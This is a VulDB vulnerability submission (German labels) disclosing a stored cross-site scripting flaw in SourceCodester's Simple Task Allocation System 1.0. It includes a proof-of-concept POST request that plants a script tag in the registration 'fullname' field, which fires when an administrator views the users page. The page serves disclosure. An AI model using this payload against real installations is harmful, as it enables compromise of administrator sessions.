| Titel | Task Allocation System XSS registration.php vulnerability |
|---|
| Beschreibung | Task Allocation System has a stored XSS vulnerability. Attackers can register a user with a malicious 'Fullname', which will trigger XSS when administrator view the USER page.
POC below:
POST /alloc/LoginRegistration.php?a=register_user HTTP/1.1
formToken=%242y%2410%24wjjCbM.1OSA%2F7kW6k8R8TO744F40ncpRrdPKEAbKbZUPQF2ZbLIwC&fullname=%3Cscript%3Ealert('foo')%3C%2Fscript%3E&username=test2&password=test2 |
|---|
| Quelle | ⚠️ https://www.sourcecodester.com/php/16358/simple-task-allocation-system-using-php-and-sqlite-source-code-free-download.html |
|---|
| Benutzer | WWesleywww (UID 43117) |
|---|
| Einreichung | 28.03.2023 13:45 (vor 3 Jahren) |
|---|
| Moderieren | 28.03.2023 22:38 (9 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 224244 [SourceCodester Simple Task Allocation System 1.0 LoginRegistration.php?a=register_user Fullname Cross Site Scripting] |
|---|
| Punkte | 20 |
|---|